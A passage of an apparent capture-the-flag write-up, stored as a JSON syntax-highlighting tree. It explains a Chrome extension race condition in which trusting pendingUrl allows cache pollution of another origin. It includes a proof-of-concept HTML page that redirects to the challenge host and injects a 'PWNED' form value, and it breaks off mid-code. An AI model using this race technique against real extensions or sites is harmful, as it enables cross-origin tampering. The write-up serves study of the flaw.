8536},{"class":130,"line":1089},[18537,18541,18545,18549,18553,18557,18561,18565,18569,18573,18577,18581],{"type":33,"tag":128,"props":18538,"children":18539},{"style":306},[18540],{"type":38,"value":13664},{"type":33,"tag":128,"props":18542,"children":18543},{"style":312},[18544],{"type":38,"value":215},{"type":33,"tag":128,"props":18546,"children":18547},{"style":135},[18548],{"type":38,"value":13157},{"type":33,"tag":128,"props":18550,"children":18551},{"style":312},[18552],{"type":38,"value":5566},{"type":33,"tag":128,"props":18554,"children":18555},{"style":676},[18556],{"type":38,"value":669},{"type":3
3,"tag":128,"props":18558,"children":18559},{"style":140},[18560],{"type":38,"value":13685},{"type":33,"tag":128,"props":18562,"children":18563},{"style":676},[18564],{"type":38,"value":669},{"type":33,"tag":128,"props":18566,"children":18567},{"style":312},[18568],{"type":38,"value":5584},{"type":33,"tag":128,"props":18570,"children":18571},{"style":306},[18572],{"type":38,"value":13545},{"type":33,"tag":128,"props":18574,"children":18575},{"style":312},[18576],{"type":38,"value":344},{"type":33,"tag":128,"props":18578,"children":18579},{"style":306},[18580],{"type":38,"value":13022},{"type":33,"tag":128,"props":18582,"children":18583},{"style":312},[18584],{"type":38,"value":13710},{"type":33,"tag":128,"props":18586,"children":18587},{"class":130,"line":1101},[18588,18592,18596,18600,18604,18608],{"type":33,"tag":128,"props":18589,"children":18590},{"style":135},[18591],{"type":38,"value":13275},{"type":33,"tag":128,"props":18593,"children":18594},{"style":312},[18595],{"type":38,"value":5566},{"type":33,"tag":128,"props":18597,"children":18598},{"style":306},[18599],{"type":38,"value":2815},{"type":33,"tag":128,"props":18601,"children":18602},{"style":312},[18603],{"type":38,"value":344},{"type":33,"tag":128,"props":18605,"children":18606},{"style":306},[18607],{"type":38,"value":13022},{"type":33,"tag":128,"props":18609,"children":18610},{"style":312},[18611],{"type":38,"value":13710},{"type":33,"tag":128,"props":18613,"children":18614},{"class":130,"line":1114},[18615],{"type":33,"tag":128,"props":18616,"children":18617},{"style":312},[18618],{"type":38,"value":13745},{"type":33,"tag":128,"props":18620,"children":18621},{"class":130,"line":1127},[18622],{"type":33,"tag":128,"props":18623,"children":18624},{"style":312},[18625],{"type":38,"value":13753},{"type":33,"tag":128,"props":18627,"children":18628},{"class":130,"line":1139},[18629],{"type":33,"tag":128,"props":18630,"children":18631},{"style":312},[18632],{"type":38,"value":854},{"type":33,"tag":128,"prop
s":18634,"children":18635},{"class":130,"line":1152},[18636],{"type":33,"tag":128,"props":18637,"children":18638},{"emptyLinePlaceholder":896},[18639],{"type":38,"value":899},{"type":33,"tag":128,"props":18641,"children":18642},{"class":130,"line":1165},[18643,18647,18651,18655,18659,18663,18667,18671,18675,18679,18683,18687,18691,18695,18699,18703],{"type":33,"tag":128,"props":18644,"children":18645},{"style":306},[18646],{"type":38,"value":13775},{"type":33,"tag":128,"props":18648,"children":18649},{"style":312},[18650],{"type":38,"value":215},{"type":33,"tag":128,"props":18652,"children":18653},{"style":306},[18654],{"type":38,"value":13784},{"type":33,"tag":128,"props":18656,"children":18657},{"style":312},[18658],{"type":38,"value":215},{"type":33,"tag":128,"props":18660,"children":18661},{"style":306},[18662],{"type":38,"value":13793},{"type":33,"tag":128,"props":18664,"children":18665},{"style":312},[18666],{"type":38,"value":215},{"type":33,"tag":128,"props":18668,"children":18669},{"style":135},[18670],{"type":38,"value":13802},{"type":33,"tag":128,"props":18672,"children":18673},{"style":312},[18674],{"type":38,"value":13071},{"type":33,"tag":128,"props":18676,"children":18677},{"style":306},[18678],{"type":38,"value":13811},{"type":33,"tag":128,"props":18680,"children":18681},{"style":312},[18682],{"type":38,"value":5584},{"type":33,"tag":128,"props":18684,"children":18685},{"style":306},[18686],{"type":38,"value":13820},{"type":33,"tag":128,"props":18688,"children":18689},{"style":312},[18690],{"type":38,"value":5584},{"type":33,"tag":128,"props":18692,"children":18693},{"style":306},[18694],{"type":38,"value":13829},{"type":33,"tag":128,"props":18696,"children":18697},{"style":312},[18698],{"type":38,"value":2966},{"type":33,"tag":128,"props":18700,"children":18701},{"style":312},[18702],{"type":38,"value":5625},{"type":33,"tag":128,"props":18704,"children":18705},{"style":312},[18706],{"type":38,"value":762},{"type":33,"tag":128,"props":18708,"children
":18709},{"class":130,"line":1177},[18710,18714,18718,18722,18726,18730,18734],{"type":33,"tag":128,"props":18711,"children":18712},{"style":300},[18713],{"type":38,"value":13849},{"type":33,"tag":128,"props":18715,"children":18716},{"style":437},[18717],{"type":38,"value":13066},{"type":33,"tag":128,"props":18719,"children":18720},{"style":312},[18721],{"type":38,"value":5566},{"type":33,"tag":128,"props":18723,"children":18724},{"style":300},[18725],{"type":38,"value":13862},{"type":33,"tag":128,"props":18727,"children":18728},{"style":312},[18729],{"type":38,"value":13259},{"type":33,"tag":128,"props":18731,"children":18732},{"style":312},[18733],{"type":38,"value":5625},{"type":33,"tag":128,"props":18735,"children":18736},{"style":312},[18737],{"type":38,"value":762},{"type":33,"tag":128,"props":18739,"children":18740},{"class":130,"line":1189},[18741,18745,18749,18753,18757,18761,18765,18769,18773,18777,18781,18785,18789,18793,18797,18801,18805,18809,18813,18817],{"type":33,"tag":128,"props":18742,"children":18743},{"style":300},[18744],{"type":38,"value":5696},{"type":33,"tag":128,"props":18746,"children":18747},{"style":306},[18748],{"type":38,"value":13886},{"type":33,"tag":128,"props":18750,"children":18751},{"style":312},[18752],{"type":38,"value":5657},{"type":33,"tag":128,"props":18754,"children":18755},{"style":300},[18756],{"type":38,"value":13061},{"type":33,"tag":128,"props":18758,"children":18759},{"style":135},[18760],{"type":38,"value":13899},{"type":33,"tag":128,"props":18762,"children":18763},{"style":312},[18764],{"type":38,"value":5566},{"type":33,"tag":128,"props":18766,"children":18767},{"style":306},[18768],{"type":38,"value":13908},{"type":33,"tag":128,"props":18770,"children":18771},{"style":312},[18772],{"type":38,"value":215},{"type":33,"tag":128,"props":18774,"children":18775},{"style":306},[18776],{"type":38,"value":13917},{"type":33,"tag":128,"props":18778,"children":18779},{"style":312},[18780],{"type":38,"value":215},{"type":33,"ta
g":128,"props":18782,"children":18783},{"style":306},[18784],{"type":38,"value":13926},{"type":33,"tag":128,"props":18786,"children":18787},{"style":300},[18788],{"type":38,"value":13931},{"type":33,"tag":128,"props":18790,"children":18791},{"style":306},[18792],{"type":38,"value":13820},{"type":33,"tag":128,"props":18794,"children":18795},{"style":312},[18796],{"type":38,"value":215},{"type":33,"tag":128,"props":18798,"children":18799},{"style":306},[18800],{"type":38,"value":13917},{"type":33,"tag":128,"props":18802,"children":18803},{"style":312},[18804],{"type":38,"value":215},{"type":33,"tag":128,"props":18806,"children":18807},{"style":306},[18808],{"type":38,"value":13952},{"type":33,"tag":128,"props":18810,"children":18811},{"style":312},[18812],{"type":38,"value":6700},{"type":33,"tag":128,"props":18814,"children":18815},{"style":306},[18816],{"type":38,"value":13961},{"type":33,"tag":128,"props":18818,"children":18819},{"style":312},[18820],{"type":38,"value":5676},{"type":33,"tag":128,"props":18822,"children":18823},{"class":130,"line":1202},[18824,18828,18832,18836,18840,18844,18848,18852,18856,18860],{"type":33,"tag":128,"props":18825,"children":18826},{"style":306},[18827],{"type":38,"value":6880},{"type":33,"tag":128,"props":18829,"children":18830},{"style":312},[18831],{"type":38,"value":215},{"type":33,"tag":128,"props":18833,"children":18834},{"style":135},[18835],{"type":38,"value":13157},{"type":33,"tag":128,"props":18837,"children":18838},{"style":312},[18839],{"type":38,"value":5566},{"type":33,"tag":128,"props":18841,"children":18842},{"style":676},[18843],{"type":38,"value":669},{"type":33,"tag":128,"props":18845,"children":18846},{"style":140},[18847],{"type":38,"value":13993},{"type":33,"tag":128,"props":18849,"children":18850},{"style":676},[18851],{"type":38,"value":669},{"type":33,"tag":128,"props":18853,"children":18854},{"style":312},[18855],{"type":38,"value":5584},{"type":33,"tag":128,"props":18857,"children":18858},{"style":306},[18
859],{"type":38,"value":13886},{"type":33,"tag":128,"props":18861,"children":18862},{"style":312},[18863],{"type":38,"value":5815},{"type":33,"tag":128,"props":18865,"children":18866},{"class":130,"line":1214},[18867,18871,18875,18879,18883,18887,18891,18895,18899,18903],{"type":33,"tag":128,"props":18868,"children":18869},{"style":306},[18870],{"type":38,"value":6880},{"type":33,"tag":128,"props":18872,"children":18873},{"style":312},[18874],{"type":38,"value":215},{"type":33,"tag":128,"props":18876,"children":18877},{"style":135},[18878],{"type":38,"value":13157},{"type":33,"tag":128,"props":18880,"children":18881},{"style":312},[18882],{"type":38,"value":5566},{"type":33,"tag":128,"props":18884,"children":18885},{"style":676},[18886],{"type":38,"value":669},{"type":33,"tag":128,"props":18888,"children":18889},{"style":140},[18890],{"type":38,"value":14037},{"type":33,"tag":128,"props":18892,"children":18893},{"style":676},[18894],{"type":38,"value":669},{"type":33,"tag":128,"props":18896,"children":18897},{"style":312},[18898],{"type":38,"value":5584},{"type":33,"tag":128,"props":18900,"children":18901},{"style":306},[18902],{"type":38,"value":14050},{"type":33,"tag":128,"props":18904,"children":18905},{"style":312},[18906],{"type":38,"value":5815},{"type":33,"tag":128,"props":18908,"children":18909},{"class":130,"line":1226},[18910,18914,18918,18922,18926,18930,18934,18938,18942,18946,18950],{"type":33,"tag":128,"props":18911,"children":18912},{"style":1576},[18913],{"type":38,"value":6625},{"type":33,"tag":128,"props":18915,"children":18916},{"style":312},[18917],{"type":38,"value":2852},{"type":33,"tag":128,"props":18919,"children":18920},{"style":306},[18921],{"type":38,"value":13811},{"type":33,"tag":128,"props":18923,"children":18924},{"style":312},[18925],{"type":38,"value":215},{"type":33,"tag":128,"props":18927,"children":18928},{"style":306},[18929],{"type":38,"value":14078},{"type":33,"tag":128,"props":18931,"children":18932},{"style":300},[18933],{"ty
pe":38,"value":13595},{"type":33,"tag":128,"props":18935,"children":18936},{"style":676},[18937],{"type":38,"value":679},{"type":33,"tag":128,"props":18939,"children":18940},{"style":140},[18941],{"type":38,"value":14091},{"type":33,"tag":128,"props":18943,"children":18944},{"style":676},[18945],{"type":38,"value":669},{"type":33,"tag":128,"props":18947,"children":18948},{"style":312},[18949],{"type":38,"value":2966},{"type":33,"tag":128,"props":18951,"children":18952},{"style":312},[18953],{"type":38,"value":762},{"type":33,"tag":128,"props":18955,"children":18956},{"class":130,"line":1239},[18957,18961,18965,18969,18973,18977,18981,18985,18989,18993,18997,19001,19005,19009,19013,19017],{"type":33,"tag":128,"props":18958,"children":18959},{"style":135},[18960],{"type":38,"value":14111},{"type":33,"tag":128,"props":18962,"children":18963},{"style":312},[18964],{"type":38,"value":5566},{"type":33,"tag":128,"props":18966,"children":18967},{"style":306},[18968],{"type":38,"value":13811},{"type":33,"tag":128,"props":18970,"children":18971},{"style":312},[18972],{"type":38,"value":215},{"type":33,"tag":128,"props":18974,"children":18975},{"style":306},[18976],{"type":38,"value":11139},{"type":33,"tag":128,"props":18978,"children":18979},{"style":312},[18980],{"type":38,"value":215},{"type":33,"tag":128,"props":18982,"children":18983},{"style":306},[18984],{"type":38,"value":13022},{"type":33,"tag":128,"props":18986,"children":18987},{"style":312},[18988],{"type":38,"value":5584},{"type":33,"tag":128,"props":18990,"children":18991},{"style":306},[18992],{"type":38,"value":14050},{"type":33,"tag":128,"props":18994,"children":18995},{"style":312},[18996],{"type":38,"value":215},{"type":33,"tag":128,"props":18998,"children":18999},{"style":306},[19000],{"type":38,"value":11139},{"type":33,"tag":128,"props":19002,"children":19003},{"style":312},[19004],{"type":38,"value":215},{"type":33,"tag":128,"props":19006,"children":19007},{"style":306},[19008],{"type":38,"value":14160},
{"type":33,"tag":128,"props":19010,"children":19011},{"style":312},[19012],{"type":38,"value":5584},{"type":33,"tag":128,"props":19014,"children":19015},{"style":306},[19016],{"type":38,"value":13886},{"type":33,"tag":128,"props":19018,"children":19019},{"style":312},[19020],{"type":38,"value":2427},{"type":33,"tag":128,"props":19022,"children":19023},{"class":130,"line":1251},[19024,19028,19032,19036,19040,19044,19048,19052,19056],{"type":33,"tag":128,"props":19025,"children":19026},{"style":312},[19027],{"type":38,"value":14180},{"type":33,"tag":128,"props":19029,"children":19030},{"style":135},[19031],{"type":38,"value":14185},{"type":33,"tag":128,"props":19033,"children":19034},{"style":312},[19035],{"type":38,"value":5566},{"type":33,"tag":128,"props":19037,"children":19038},{"style":306},[19039],{"type":38,"value":14194},{"type":33,"tag":128,"props":19041,"children":19042},{"style":312},[19043],{"type":38,"value":5625},{"type":33,"tag":128,"props":19045,"children":19046},{"style":135},[19047],{"type":38,"value":13829},{"type":33,"tag":128,"props":19049,"children":19050},{"style":312},[19051],{"type":38,"value":5566},{"type":33,"tag":128,"props":19053,"children":19054},{"style":306},[19055],{"type":38,"value":14194},{"type":33,"tag":128,"props":19057,"children":19058},{"style":312},[19059],{"type":38,"value":2459},{"type":33,"tag":128,"props":19061,"children":19062},{"class":130,"line":1263},[19063,19067,19071,19075,19079,19083,19087,19091,19095],{"type":33,"tag":128,"props":19064,"children":19065},{"style":312},[19066],{"type":38,"value":14180},{"type":33,"tag":128,"props":19068,"children":19069},{"style":135},[19070],{"type":38,"value":14226},{"type":33,"tag":128,"props":19072,"children":19073},{"style":312},[19074],{"type":38,"value":5566},{"type":33,"tag":128,"props":19076,"children":19077},{"style":306},[19078],{"type":38,"value":6889},{"type":33,"tag":128,"props":19080,"children":19081},{"style":312},[19082],{"type":38,"value":5625},{"type":33,"tag":128,"
props":19084,"children":19085},{"style":135},[19086],{"type":38,"value":13829},{"type":33,"tag":128,"props":19088,"children":19089},{"style":312},[19090],{"type":38,"value":5836},{"type":33,"tag":128,"props":19092,"children":19093},{"style":306},[19094],{"type":38,"value":14251},{"type":33,"tag":128,"props":19096,"children":19097},{"style":312},[19098],{"type":38,"value":14256},{"type":33,"tag":128,"props":19100,"children":19101},{"class":130,"line":1276},[19102,19106,19110,19114,19118,19122,19126,19130,19134,19138,19142,19146,19150],{"type":33,"tag":128,"props":19103,"children":19104},{"style":312},[19105],{"type":38,"value":14264},{"type":33,"tag":128,"props":19107,"children":19108},{"style":1576},[19109],{"type":38,"value":14269},{"type":33,"tag":128,"props":19111,"children":19112},{"style":1576},[19113],{"type":38,"value":14274},{"type":33,"tag":128,"props":19115,"children":19116},{"style":312},[19117],{"type":38,"value":2852},{"type":33,"tag":128,"props":19119,"children":19120},{"style":306},[19121],{"type":38,"value":13811},{"type":33,"tag":128,"props":19123,"children":19124},{"style":312},[19125],{"type":38,"value":215},{"type":33,"tag":128,"props":19127,"children":19128},{"style":306},[19129],{"type":38,"value":14078},{"type":33,"tag":128,"props":19131,"children":19132},{"style":300},[19133],{"type":38,"value":13595},{"type":33,"tag":128,"props":19135,"children":19136},{"style":676},[19137],{"type":38,"value":679},{"type":33,"tag":128,"props":19139,"children":19140},{"style":140},[19141],{"type":38,"value":14303},{"type":33,"tag":128,"props":19143,"children":19144},{"style":676},[19145],{"type":38,"value":669},{"type":33,"tag":128,"props":19147,"children":19148},{"style":312},[19149],{"type":38,"value":2966},{"type":33,"tag":128,"props":19151,"children":19152},{"style":312},[19153],{"type":38,"value":762},{"type":33,"tag":128,"props":19155,"children":19156},{"class":130,"line":1288},[19157,19161,19165,19169,19173,19177,19181,19185,19189,19193],{"type":33,"ta
g":128,"props":19158,"children":19159},{"style":135},[19160],{"type":38,"value":14323},{"type":33,"tag":128,"props":19162,"children":19163},{"style":312},[19164],{"type":38,"value":5566},{"type":33,"tag":128,"props":19166,"children":19167},{"style":306},[19168],{"type":38,"value":13811},{"type":33,"tag":128,"props":19170,"children":19171},{"style":312},[19172],{"type":38,"value":215},{"type":33,"tag":128,"props":19174,"children":19175},{"style":306},[19176],{"type":38,"value":11139},{"type":33,"tag":128,"props":19178,"children":19179},{"style":312},[19180],{"type":38,"value":215},{"type":33,"tag":128,"props":19182,"children":19183},{"style":306},[19184],{"type":38,"value":13022},{"type":33,"tag":128,"props":19186,"children":19187},{"style":312},[19188],{"type":38,"value":5584},{"type":33,"tag":128,"props":19190,"children":19191},{"style":306},[19192],{"type":38,"value":13886},{"type":33,"tag":128,"props":19194,"children":19195},{"style":312},[19196],{"type":38,"value":2427},{"type":33,"tag":128,"props":19198,"children":19199},{"class":130,"line":1300},[19200,19204,19208,19212,19216,19220,19224,19228,19232],{"type":33,"tag":128,"props":19201,"children":19202},{"style":312},[19203],{"type":38,"value":14180},{"type":33,"tag":128,"props":19205,"children":19206},{"style":135},[19207],{"type":38,"value":14185},{"type":33,"tag":128,"props":19209,"children":19210},{"style":312},[19211],{"type":38,"value":5566},{"type":33,"tag":128,"props":19213,"children":19214},{"style":306},[19215],{"type":38,"value":14194},{"type":33,"tag":128,"props":19217,"children":19218},{"style":312},[19219],{"type":38,"value":5625},{"type":33,"tag":128,"props":19221,"children":19222},{"style":135},[19223],{"type":38,"value":13829},{"type":33,"tag":128,"props":19225,"children":19226},{"style":312},[19227],{"type":38,"value":5566},{"type":33,"tag":128,"props":19229,"children":19230},{"style":306},[19231],{"type":38,"value":14194},{"type":33,"tag":128,"props":19233,"children":19234},{"style":312},[192
35],{"type":38,"value":2459},{"type":33,"tag":128,"props":19237,"children":19238},{"class":130,"line":1313},[19239,19243,19247,19251,19255,19259,19263,19267,19271],{"type":33,"tag":128,"props":19240,"children":19241},{"style":312},[19242],{"type":38,"value":14180},{"type":33,"tag":128,"props":19244,"children":19245},{"style":135},[19246],{"type":38,"value":14226},{"type":33,"tag":128,"props":19248,"children":19249},{"style":312},[19250],{"type":38,"value":5566},{"type":33,"tag":128,"props":19252,"children":19253},{"style":306},[19254],{"type":38,"value":6889},{"type":33,"tag":128,"props":19256,"children":19257},{"style":312},[19258],{"type":38,"value":5625},{"type":33,"tag":128,"props":19260,"children":19261},{"style":135},[19262],{"type":38,"value":13829},{"type":33,"tag":128,"props":19264,"children":19265},{"style":312},[19266],{"type":38,"value":5836},{"type":33,"tag":128,"props":19268,"children":19269},{"style":306},[19270],{"type":38,"value":14251},{"type":33,"tag":128,"props":19272,"children":19273},{"style":312},[19274],{"type":38,"value":14256},{"type":33,"tag":128,"props":19276,"children":19277},{"class":130,"line":1327},[19278],{"type":33,"tag":128,"props":19279,"children":19280},{"style":312},[19281],{"type":38,"value":6760},{"type":33,"tag":128,"props":19283,"children":19284},{"class":130,"line":11196},[19285],{"type":33,"tag":128,"props":19286,"children":19287},{"style":312},[19288],{"type":38,"value":13321},{"type":33,"tag":128,"props":19290,"children":19291},{"class":130,"line":11204},[19292,19296,19300],{"type":33,"tag":128,"props":19293,"children":19294},{"style":1576},[19295],{"type":38,"value":13056},{"type":33,"tag":128,"props":19297,"children":19298},{"style":1576},[19299],{"type":38,"value":5850},{"type":33,"tag":128,"props":19301,"children":19302},{"style":312},[19303],{"type":38,"value":5676},{"type":33,"tag":128,"props":19305,"children":19306},{"class":130,"line":11213},[19307],{"type":33,"tag":128,"props":19308,"children":19309},{"style":31
2},[19310],{"type":38,"value":5902},{"type":33,"tag":40,"props":19312,"children":19314},{"id":19313},"race-condition-to-chrome-cache-pollution",[19315],{"type":38,"value":12046},{"type":33,"tag":47,"props":19317,"children":19318},{},[19319],{"type":38,"value":19320},"The first part of the challenge concerns a race condition in the background script.",{"type":33,"tag":47,"props":19322,"children":19323},{},[19324],{"type":38,"value":19325},"If we focus on the beginning of the background script, we can see that the sender_origin variable is defined in this way:",{"type":33,"tag":114,"props":19327,"children":19328},{"lang":5526},[19329],{"type":33,"tag":119,"props":19330,"children":19332},{"className":5530,"code":19331,"language":5526,"meta":8,"style":8},"const sender_origin = new URL(sender.tab.pendingUrl ?? sender.tab.url).origin;\n",[19333],{"type":33,"tag":105,"props":19334,"children":19335},{"__ignoreMap":8},[19336],{"type":33,"tag":128,"props":19337,"children":19338},{"class":130,"line":131},[19339,19343,19347,19351,19355,19359,19363,19367,19371,19375,19379,19383,19387,19391,19395,19399,19403,19407,19411,19415],{"type":33,"tag":128,"props":19340,"children":19341},{"style":300},[19342],{"type":38,"value":15973},{"type":33,"tag":128,"props":19344,"children":19345},{"style":306},[19346],{"type":38,"value":13886},{"type":33,"tag":128,"props":19348,"children":19349},{"style":312},[19350],{"type":38,"value":5657},{"type":33,"tag":128,"props":19352,"children":19353},{"style":300},[19354],{"type":38,"value":13061},{"type":33,"tag":128,"props":19356,"children":19357},{"style":135},[19358],{"type":38,"value":13899},{"type":33,"tag":128,"props":19360,"children":19361},{"style":312},[19362],{"type":38,"value":5566},{"type":33,"tag":128,"props":19364,"children":19365},{"style":306},[19366],{"type":38,"value":13908},{"type":33,"tag":128,"props":19368,"children":19369},{"style":312},[19370],{"type":38,"value":215},{"type":33,"tag":128,"props":19372,"children":19373},{"style":306
},[19374],{"type":38,"value":13917},{"type":33,"tag":128,"props":19376,"children":19377},{"style":312},[19378],{"type":38,"value":215},{"type":33,"tag":128,"props":19380,"children":19381},{"style":306},[19382],{"type":38,"value":13926},{"type":33,"tag":128,"props":19384,"children":19385},{"style":300},[19386],{"type":38,"value":13931},{"type":33,"tag":128,"props":19388,"children":19389},{"style":306},[19390],{"type":38,"value":13820},{"type":33,"tag":128,"props":19392,"children":19393},{"style":312},[19394],{"type":38,"value":215},{"type":33,"tag":128,"props":19396,"children":19397},{"style":306},[19398],{"type":38,"value":13917},{"type":33,"tag":128,"props":19400,"children":19401},{"style":312},[19402],{"type":38,"value":215},{"type":33,"tag":128,"props":19404,"children":19405},{"style":306},[19406],{"type":38,"value":13952},{"type":33,"tag":128,"props":19408,"children":19409},{"style":312},[19410],{"type":38,"value":6700},{"type":33,"tag":128,"props":19412,"children":19413},{"style":306},[19414],{"type":38,"value":13961},{"type":33,"tag":128,"props":19416,"children":19417},{"style":312},[19418],{"type":38,"value":5676},{"type":33,"tag":47,"props":19420,"children":19421},{},[19422],{"type":38,"value":19423},"The pendingUrl property in the Chrome Sender Object (found in the chrome.runtime API) is available in Chrome extensions to indicate a URL that a tab is in the process of navigating to, but has not yet fully loaded.",{"type":33,"tag":47,"props":19425,"children":19426},{},[19427,19429,19435],{"type":38,"value":19428},"This definition is problematic because it will take into account the pendingURL to define the value of the origin that will be used. It is therefore possible to arbitrarily pollute the chrome cache of an origin. We must therefore use a race condition for this. 
If you are not comfortable with the term Race condition, I advise you to check out the write-up of the ",{"type":33,"tag":53,"props":19430,"children":19432},{"href":19431},"/writeups/phantom-feed#race-condition",[19433],{"type":38,"value":19434},"Phantom-feed challenge",{"type":38,"value":215},{"type":33,"tag":47,"props":19437,"children":19438},{},[19439,19441,19447,19449],{"type":38,"value":19440},"With this code, we can demonstrate that it is possible to pollute the origin: ",{"type":33,"tag":105,"props":19442,"children":19444},{"className":19443},[],[19445],{"type":38,"value":19446},"shikanoko.challenge",{"type":38,"value":19448}," by updating the form value to: ",{"type":33,"tag":105,"props":19450,"children":19452},{"className":19451},[],[19453],{"type":38,"value":19454},"PWNED shikanoko nokonoko koshitantan",{"type":33,"tag":114,"props":19456,"children":19457},{"lang":5929},[19458],{"type":33,"tag":119,"props":19459,"children":19461},{"className":5933,"code":19460,"language":5929,"meta":8,"style":8},"\u003Chtml>\n    \u003Cbody>\n        \u003Ch1>Test poc\u003C/h1>\n        \u003Cinput id=\"html\" type=\"text\" name=\"html\" placeholder=\"Enter HTML content\">\n    \u003C/body>\n    \u003Cscript>\n        (async () => {\n            const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n                await sleep(1000);\n                document.location = \"http://shikanoko.challenge:8547/\";\n                html_elm = document.getElementById(\"html\");\n                html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n                let event = new Event('change');\n                html_elm.dispatchEvent(event);\n        })();\n    \u003C/script>\n\u003C/html> 
\n",[19462],{"type":33,"tag":105,"props":19463,"children":19464},{"__ignoreMap":8},[19465,19480,19495,19527,19622,19637,19652,19676,19756,19780,19817,19862,19897,19942,19970,19978,19993],{"type":33,"tag":128,"props":19466,"children":19467},{"class":130,"line":131},[19468,19472,19476],{"type":33,"tag":128,"props":19469,"children":19470},{"style":312},[19471],{"type":38,"value":5977},{"type":33,"tag":128,"props":19473,"children":19474},{"style":1576},[19475],{"type":38,"value":5929},{"type":33,"tag":128,"props":19477,"children":19478},{"style":312},[19479],{"type":38,"value":6097},{"type":33,"tag":128,"props":19481,"children":19482},{"class":130,"line":362},[19483,19487,19491],{"type":33,"tag":128,"props":19484,"children":19485},{"style":312},[19486],{"type":38,"value":6105},{"type":33,"tag":128,"props":19488,"children":19489},{"style":1576},[19490],{"type":38,"value":5671},{"type":33,"tag":128,"props":19492,"children":19493},{"style":312},[19494],{"type":38,"value":6097},{"type":33,"tag":128,"props":19496,"children":19497},{"class":130,"line":403},[19498,19502,19506,19510,19515,19519,19523],{"type":33,"tag":128,"props":19499,"children":19500},{"style":312},[19501],{"type":38,"value":14877},{"type":33,"tag":128,"props":19503,"children":19504},{"style":1576},[19505],{"type":38,"value":34},{"type":33,"tag":128,"props":19507,"children":19508},{"style":312},[19509],{"type":38,"value":6054},{"type":33,"tag":128,"props":19511,"children":19512},{"style":323},[19513],{"type":38,"value":19514},"Test 
poc",{"type":33,"tag":128,"props":19516,"children":19517},{"style":312},[19518],{"type":38,"value":6190},{"type":33,"tag":128,"props":19520,"children":19521},{"style":1576},[19522],{"type":38,"value":34},{"type":33,"tag":128,"props":19524,"children":19525},{"style":312},[19526],{"type":38,"value":6097},{"type":33,"tag":128,"props":19528,"children":19529},{"class":130,"line":739},[19530,19534,19538,19542,19546,19550,19554,19558,19562,19566,19570,19574,19578,19582,19586,19590,19594,19598,19602,19606,19610,19614,19618],{"type":33,"tag":128,"props":19531,"children":19532},{"style":312},[19533],{"type":38,"value":14877},{"type":33,"tag":128,"props":19535,"children":19536},{"style":1576},[19537],{"type":38,"value":14882},{"type":33,"tag":128,"props":19539,"children":19540},{"style":306},[19541],{"type":38,"value":5987},{"type":33,"tag":128,"props":19543,"children":19544},{"style":312},[19545],{"type":38,"value":315},{"type":33,"tag":128,"props":19547,"children":19548},{"style":676},[19549],{"type":38,"value":669},{"type":33,"tag":128,"props":19551,"children":19552},{"style":140},[19553],{"type":38,"value":5929},{"type":33,"tag":128,"props":19555,"children":19556},{"style":676},[19557],{"type":38,"value":669},{"type":33,"tag":128,"props":19559,"children":19560},{"style":306},[19561],{"type":38,"value":14887},{"type":33,"tag":128,"props":19563,"children":19564},{"style":312},[19565],{"type":38,"value":315},{"type":33,"tag":128,"props":19567,"children":19568},{"style":676},[19569],{"type":38,"value":669},{"type":33,"tag":128,"props":19571,"children":19572},{"style":140},[19573],{"type":38,"value":38},{"type":33,"tag":128,"props":19575,"children":19576},{"style":676},[19577],{"type":38,"value":669},{"type":33,"tag":128,"props":19579,"children":19580},{"style":306},[19581],{"type":38,"value":14688},{"type":33,"tag":128,"props":19583,"children":19584},{"style":312},[19585],{"type":38,"value":315},{"type":33,"tag":128,"props":19587,"children":19588},{"style":676},[19589],{"type"
:38,"value":669},{"type":33,"tag":128,"props":19591,"children":19592},{"style":140},[19593],{"type":38,"value":5929},{"type":33,"tag":128,"props":19595,"children":19596},{"style":676},[19597],{"type":38,"value":669},{"type":33,"tag":128,"props":19599,"children":19600},{"style":306},[19601],{"type":38,"value":14928},{"type":33,"tag":128,"props":19603,"children":19604},{"style":312},[19605],{"type":38,"value":315},{"type":33,"tag":128,"props":19607,"children":19608},{"style":676},[19609],{"type":38,"value":669},{"type":33,"tag":128,"props":19611,"children":19612},{"style":140},[19613],{"type":38,"value":14941},{"type":33,"tag":128,"props":19615,"children":19616},{"style":676},[19617],{"type":38,"value":669},{"type":33,"tag":128,"props":19619,"children":19620},{"style":312},[19621],{"type":38,"value":6097},{"type":33,"tag":128,"props":19623,"children":19624},{"class":130,"line":765},[19625,19629,19633],{"type":33,"tag":128,"props":19626,"children":19627},{"style":312},[19628],{"type":38,"value":14993},{"type":33,"tag":128,"props":19630,"children":19631},{"style":1576},[19632],{"type":38,"value":5671},{"type":33,"tag":128,"props":19634,"children":19635},{"style":312},[19636],{"type":38,"value":6097},{"type":33,"tag":128,"props":19638,"children":19639},{"class":130,"line":804},[19640,19644,19648],{"type":33,"tag":128,"props":19641,"children":19642},{"style":312},[19643],{"type":38,"value":6105},{"type":33,"tag":128,"props":19645,"children":19646},{"style":1576},[19647],{"type":38,"value":15064},{"type":33,"tag":128,"props":19649,"children":19650},{"style":312},[19651],{"type":38,"value":6097},{"type":33,"tag":128,"props":19653,"children":19654},{"class":130,"line":839},[19655,19660,19664,19668,19672],{"type":33,"tag":128,"props":19656,"children":19657},{"style":312},[19658],{"type":38,"value":19659},"        
(",{"type":33,"tag":128,"props":19661,"children":19662},{"style":300},[19663],{"type":38,"value":13862},{"type":33,"tag":128,"props":19665,"children":19666},{"style":312},[19667],{"type":38,"value":13259},{"type":33,"tag":128,"props":19669,"children":19670},{"style":312},[19671],{"type":38,"value":5625},{"type":33,"tag":128,"props":19673,"children":19674},{"style":312},[19675],{"type":38,"value":762},{"type":33,"tag":128,"props":19677,"children":19678},{"class":130,"line":848},[19679,19684,19689,19693,19697,19702,19706,19710,19714,19718,19722,19726,19730,19735,19739,19743,19747,19752],{"type":33,"tag":128,"props":19680,"children":19681},{"style":300},[19682],{"type":38,"value":19683},"            const",{"type":33,"tag":128,"props":19685,"children":19686},{"style":135},[19687],{"type":38,"value":19688}," 